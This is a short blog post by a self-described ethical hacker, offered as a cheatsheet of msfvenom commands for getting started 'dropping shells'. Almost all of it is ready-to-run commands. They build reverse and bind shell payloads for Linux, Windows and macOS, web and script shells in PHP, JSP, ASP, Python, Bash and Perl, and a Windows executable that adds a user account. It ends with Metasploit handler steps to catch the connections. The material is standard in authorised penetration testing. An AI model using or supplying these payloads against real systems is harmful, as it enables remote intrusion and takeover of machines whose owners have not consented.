cft

MSFVenom Cheatsheet

The only MSFVenom Cheatsheet you'll ever need.


user

Andrew Long

2 years ago | 1 min read

MSFVenom, if you’re not already familiar, is the payload creating cousin of Metasploit. With it, you can create a wide variety of shellcodes, reverse tcp connectors, and much more. I’ll leave the full explanation for another article, as I’m sure you probably know the basics if you’re here. This command cheatsheet should be all you need to get started dropping shells.

Commands

List available payloads
msfvenom -l payloads
List payload options
msfvenom -p PAYLOAD --list-options
Meterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux
Linux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux reverse shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Windows Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
Windows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows add user
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho
Mac Bind shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho
Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py
BASH Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh
PERL Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl
ASP Meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp
JSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp
WAR Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war
Php Reverse Shell
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php

Bonus

Additionally, here is an example of how to start a listener through metasploit.

root@kali: msfconsole -qmsf: use exploit/multi/handler
msf: set LHOST <your listening address>
msf: set LPORT <your listening port>
msf: set payload windows/shell/reverse_tcp <or relevant payload>
msf: run

Upvote


user
Created by

Andrew Long

Ethical hacker and IoT security specialist.


people
Post

Upvote

Downvote

Comment

Bookmark

Share


Related Articles